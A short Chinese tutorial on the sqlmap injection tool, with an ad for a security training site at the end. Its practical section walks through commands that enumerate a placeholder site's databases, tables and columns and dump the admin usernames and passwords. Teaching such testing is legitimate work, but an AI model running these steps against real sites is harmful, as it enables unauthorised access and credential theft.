首先,先簡單介紹下sqlmap
簡介:
sqlmap是一種開源的工具,可以自動檢測和利用SQL注入以及接入該庫的服務器。它擁有非常強大的檢測引擎、具有多種特性的器、通過庫指紋提取訪問底層文件系統並通過外帶連接執行命令。
支持的數據庫:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。
sqlmap支持五種不同的注入模式:
UNION query SQL injection(可聯合查詢注入Error-based SQL injection(報錯型注入)Boolean-based blind SQL injection(布爾型注入)Time-based blind SQL injection(基於時間延遲注入)Stacked queries SQL injection(可多語句查詢注入)
基本用法:-u 使用sqlmap--dbs 獲取數據庫名--tables 獲取表名--columns 獲取字段名
--dump 獲取字段內容
實戰:
1.獲取庫名
python2 sqlmap.py -u "http://xxx.com" --dbs
成功獲取庫名
接下來得根據經驗,猜他的賬戶,密碼 在哪個庫裡,或者都進去看看也可以。
2.繼續獲取表名
python2 sqlmap.py -u "http://xxx.com" -D 庫名 --tables
看見admin 看來離目標 不遠了
3.獲取字段名
python2 sqlmap.py -u "http://xxx.com" -D 庫名 -T admin --columns
看到admin_name admin _pass 果然就在這
4.獲取用戶名,密碼
python2 sqlmap.py -u "http://xxx.com" -D 庫名 -T admin -C admin_name,admin_pass --dump
安界網通過開發全球頂尖的網絡安全教育精品內容,致力於教育+AI、理論+實戰、線上+線下的創新科技教育模式,結合專有師帶徒模式貼合應用、實戰式教學場景,打造知識課程、社交實戰和生態服務為一體的全棧式網絡安全教育服務平臺;同時研發輔助安全教育平臺工具化和產品化的安全服務類型產品;實現為企業提供"一站式"全生命週期的網絡安全綜合服務提供商。有興趣的小夥伴可以私信撩我!
閱讀更多 安界 的文章